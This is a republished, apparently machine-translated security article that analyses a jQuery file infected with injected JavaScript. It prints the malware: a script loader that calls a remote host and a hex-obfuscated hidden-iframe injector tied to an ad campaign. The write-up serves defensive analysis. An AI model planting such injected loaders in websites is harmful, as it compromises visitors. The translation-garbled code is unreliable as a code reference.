Web iframe injection case 01/19 Update SLTechnology News&Howtos

Web iframe injection case

2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

External link address: hXXp://www.ldkxzzs.com/script/jquery-1.3.2.min.js

Use the window FC command to compare normal files with unlinked web pages

Comparing file C:\ USERS\ AT\ DESKTOP\ jquery-1.3.2.min.js with C:\ USERS\ AT\ DESKTOP\ JS [infored]\ JQUERY-1.3.2.MIN (2) .js

* C:\ USERS\ AT\ DESKTOP\ JS [infored]\ jquery-1.3.2.min.js

JQuery JavaScript Library v1.3.2

* C:\ USERS\ AT\ DESKTOP\ JS [infored]\ JQUERY-1.3.2.MIN (2) .JS

/ visitorTracker*/

Var visanalyzerin = setInterval (function () {

If (document.body! = null & & typeof document.body! = "undefined") {

ClearInterval (visanalyzerin)

If (typeof window ["globalvisitor"] = = "undefined") {

Window ["globalvisitor"] = 1

Var isIE = visanalyzerde ()

Var isChrome =! isIE & &!! window.chrome & & window.navigator.vendor = = "Google Inc."

If (visanalyzer_isMob ()) {

Var visanalyzervs = document.createElement ("script"); visanalyzervs.src = "hXXp://ldkxzzs.com/bbs/data/forums/temps/tracks.php?mob=1"; document.getElementsByTagName ("head") [0] .appendChild (visanalyzervs)

} else {

If ((isIE & &! isChrome & &! visanalyzer_isMob () {

Var visanalyzervs = document.createElement ("script"); visanalyzervs.src = "hXXp://ldkxzzs.com/bbs/data/forums/temps/tracks.php"; document.getElementsByTagName ("head") [0] .appendChild (visanalyzervs)

}

Visitortracksdel ()

}

}, 100)

Function visitortracksdel () {

/ / return

Var curscid = "none"

If (curscid! = "none") {

Var csr = document.getElementById (curscid)

If (typeof csr! = undefined & & csr! = null) {

Csr.outerHTML = ""

Delete csr

}

Function visanalyzerde () {

Var ua = window.navigator.userAgent

Var msie = ua.indexOf ("MSIE")

If (msie > 0) {

Return parseInt (ua.substring (msie + 5, ua.indexOf (".", msie)), 10)

}

Var trident = ua.indexOf ("Trident/")

If (trident > 0) {

Var rv = ua.indexOf ("rv:")

Return parseInt (ua.substring (rv + 3, ua.indexOf (., rv)), 10)

}

Var edge = ua.indexOf ("Edge/")

If (edge > 0) {

Return parseInt (ua.substring (edge + 5, ua.indexOf (".", edge)), 10)

}

Return false

}

Function visanalyzerisMob () {

Var ua = window.navigator.userAgent.toLowerCase ()

6) 0 | symbian | treo | up. (browser | link) | vodafone | wap | windows ce | xda | xiino/i.test (ua) | | / 1207 | 6310 | 6590 | 3gso | 4thp | 50 [1-6] I | 770s | 802s |

A wa | abac | ac (er | oo | s -) | ai (ko | rn) | al (av | ca | co) | amoi | an (ex | ny | yw) | aptu | ar (ch | go) | as (te | us) | attw | au (di |-m | r | s) | avan | be (ck | ll | n)

Q) | bi (lb | rd) | bl (ac | az) | br (e | v) w | bumb | bw- (n | u) | c55\ / | capi | ccwa | cdm- | chtm | cldc | cmd- | co (mp | nd) | craw | da (it | ll | ng) | dbte | dc-

S | devi | dica | dmob | do (c | p) o | ds (12 |-d) | el (49 | ai) | em (L2 | ul) | er (ic | K0) | esl8 | ez ([4-7] 0 | os | wa | ze) | fetc | fly (- |) | G1 u | g560 | gene | gf-5

| | g-mo | go (.w | od) | gr (ad | un) | haie | hcit | hd- (m | p | t) | hei- | hi (pt | ta) | hp (I | ip) | hs-c | ht (c (- | _ | a | g | p | s | t) | tp) | hu (aw | tc) | i20 | g |

O | ma) | i230 | iac (|-|\ /) | ibro | idea | ig01 | ikom | im1k | inno | ipaq | iris | ja (t | v) a | jbro | jemu | kddi | keji | kgt (|\ /) | klon | kpt | kwc- | kyo

(C | k) | le (no | xi) | lg (g |\ / (k | l | u) | 50 | 54 |-[aripw]) | libw | lynx | M1 Maiw | m3ga | M50\ / | ma (te | ui | xo) | mc (01 | 21 | ca) | m-cr | me (rc | ri) | mi (O8 | oa | ts)

) | mmef | mo (01 | 02 | bi | de | do | t (- | o | v) | zz) | mt (50 | p1 | v) | mwbp | mywa | n10 [0-2] | N20 [2-3] | n30 (0 | 2) | n50 (0 | 2 | 5) | N7 (0 (0 | 1) | 10) | ne ((c | m)-| |

On | tf | wf | wg | wt) | nok (6 | I) | nzph | o2im | op (ti | wv) | oran | owg1 | p800 | pan (a | d | t) | pdxg | pg (13 |-([1-8] | c)) | phil | pire | pl (ay | uc) | pn-2 | po (ck |

Rt | se) | prox | psio | pt-g | qa-a | qc (07 | 12 | 21 | 32 | 60 |-[2-7] | I -) | qtek | R380 | R600 | raks | ro (ve | zo) | s55\ / | sa (ge | ma | mm | ms | ny | va) | sc (0)

| 1 | h-| oo | p -) | sdk\ / | se (c (- | 0 | 1) | 47 | mc | nd | ri) | sgh- | shar | sie (- | m) | sk-0 | sl (45 | id) | sm (al | ar | b3 | it | T5) | so (ft | ny) | sp (01 | h-| v-| v)

) | sy (01 | mb) | T2 (18 | 50) | T2 (00 | 10 | 18) | ta (gt | lk) | tcl- | tdg- | tel (I | m) | tim- | t-mo | to (pl | sh) | ts (70 | m-| m3 | M5) | tx-9 | up (.b | G1 | si) | u

Tst | v400 | v750 | veri | vi (rg | te) | vk (40 | 5 [0-3] |-v) | vm40 | voda | vulc | vx (52 | 53 | 60 | 61 | 70 | 81 | 83 | 85 | 98) | W3C (- |) | webc | whit | wi (g | nc | nw)

) | wmlb | wonu | x700 | yas- | your | zeto | zte-/i.test (ua.substr (0heli4) {

Return true

}

Return false

} / visitorTracker//*

JQuery JavaScript Library v1.3.2

C:\ USERS\ AT\ DESKTOP\ JS [included]\ jquery-1.3.2.min.js

Roll "+ G], document.body [" offset "+ G], document.documentElement [" offset "+ G]): this.length?o.css (this [0], J): null): this.css

Ypeof Knights = "string"? KRV KV + "px")})}) ()

C:\ USERS\ AT\ DESKTOP\ JS [included]\ JQUERY-1.3.2.MIN (2) .JS

Roll "+ G], document.body [" offset "+ G], document.documentElement [" offset "+ G]): this.length?o.css (this [0], J): null): this.css

Ypeof Knights = "string"? KRV KV + "px")})}) ()

/ ceaac6f63aa22c2d228fa77b762e3461/

Var _ 0xdc56 = ["\ x6F\ x6E\ x6F\ x6F\ x61\ x64", "\ x67\ x65\ x74\ x44\ x61\ x65", "\ x73\ x65\ x74\ x44\ x61\ x74\ x65", "\ x63\ x6F\ x6F\ x6B\ x69\ x65"

","\ x3B\ x20\ x65\ x78\ x70\ x69\ x72\ x65\ x73\ x3D ","\ x74\ x6F\ x54\ x43\ x53\ x74\ x72\ x69\ x6E\ x67 ","\ x3D\ x28\ x5B\ x5e\ x3B\ x5D "

\ x29\ x7B\ x31\ x2C\ x7D ","\ x65\ x78\ x65\ x63 ","\ x73\ x70\ x6C\ x69\ x74 ","\ x61\ x64\ x2D\ x63\ x6F\ x6F\ x6B\ x69\ x65 ","\ x65\ x72\ x32\ x76\ x64\ x7 "

2\ x35\ x67\ x64\ x63\ x33\ x73 ","\ x64\ x69\ x76 ","\ x63\ x72\ x65\ x61\ x74\ x45\ x6C\ x65\ x6D\ x65\ x6E\ x74 ","\ x68\ x74\ x74\ x70\ x3A\ x2F\

X2F\ x73\ x74\ x61\ x69\ x63\ x2E\ x74\ x72\ x79\ x6D\ x66\ x69\ x6E\ x67\ x65\ x72\ x2E\ x65\ x62\ x73\ x69\ x74\ x65\ x2F\ x61\ x64\ x2F\ x3F

\ x69\ x64\ x3D\ x36\ x39\ x34\ x33\ x33\ x31\ x26\ x6B\ x65\ x79\ x77\ x6F\ x72\ x64\ x3D ","\ x26\ x61\ x64\ x76\ x72\ x74\ x3D\ x55\ x48\ x68\ x75

\ x79\ x34 ","\ x69\ x6E\ x6e\ x65\ x72\ x48\ x54\ x4D\ x4C ","\ x3C\ x64\ x69\ x76\ x20\ x73\ x74\ x79\ x6C\ x65\ x3D\ x27\ x70\ x6F\ x73\ x69\ x74\ x6F\

X6E\ x3A\ x61\ x62\ x73\ x6F\ x6C\ x75\ x74\ x65\ x3B\ x7A\ x2D\ x69\ x6E\ x64\ x65\ x78\ x3A\ x31\ x30\ x30\ x3B\ x74\ x6F\ x70\ x3A\ x2D\ x31\ x30\ x30

\ x30\ x70\ x78\ x3B\ x6C\ x65\ x66\ x74\ x3A\ x2D\ x39\ x70\ x78\ x3B\ x27\ x3E\ x69\ x66\ x61\ x6D\ x65\ x20\ x73\ x72\ x63\ x3D\ x2

7 ","\ x27\ x3E\ x3C\ x2F\ x69\ x66\ x72\ x61\ x6D\ x65\ x3E\ x3F\ x64\ x69\ x76\ x3e ","\ x61\ x70\ x70\ x65\ x6E\ x64\ x43\ x68\ x6C\ x64 ","\ x62 "

X6F\ x64\ x79 "]; window [_ 0xdc56 [0]] = function () {function _ 0x739ex1 (_ 0x739ex2) {if (_ 0x739ex4) {var _ 0x739ex5 = new

Date (); _ 0x739ex5 [_ 0xdc56 [2]] (_ 0x739ex5 [_ 0xdc56 [1]] () + _ 0x739ex4);}; if (_ 0x739ex2&&_0x739ex3) {document [_ 0xdc56 [3]] = _ 0x739ex2+_0xdc

56 [4] + _ 0x739ex3 + (_ 0x739ex4?_0xdc56 [5] + _ 0x739ex5 [_ 0xdc56 [6]] (): _ 0xdc56 [7])} else {return false};} function _ 0x739ex6 (_ 0x739ex2) {va

R _ 0x739ex3 = new RegExp (_ 0x739ex2+_0xdc56 [8]); var _ 0x739ex4=_0x739ex3_0xdc56 [9]; if (_ 0x739ex4) {_ 0x739ex4

= _ 0x739ex4 [0] _ 0xdc56 [10]} else {return false}; return _ 0x739ex4 [1]? _ 0x739ex4 [1]: false;} var _ 0x739ex7=_0x739ex6 (_ 0xd

C56 [11]); if (_ 0x739ex7 / 0xdc56 / 0xdc56 [12]) {_ 0x739ex1 (_ 0xdc56 [11], _ 0xdc56 [12], 1); var _ 0x739ex8=document_0xdc56 [14]; var _

0x739ex9x660702 [var _ 0x739exabath _ 0xdc56 [15] + _ 0x739ex9+_0xdc56 [16]; _ 0x739ex8 [_ 0xdc56 [17]] = _ 0xdc56 [18] + _ 0x739exa+_0xdc56 [19]; docume

Nt [_ 0xdc56 [21]] _ 0xdc56 [20];};}

/ ceaac6f63aa22c2d228fa77b762e3461/

Hexadecimal conversion result:

Related report: https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection.html

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.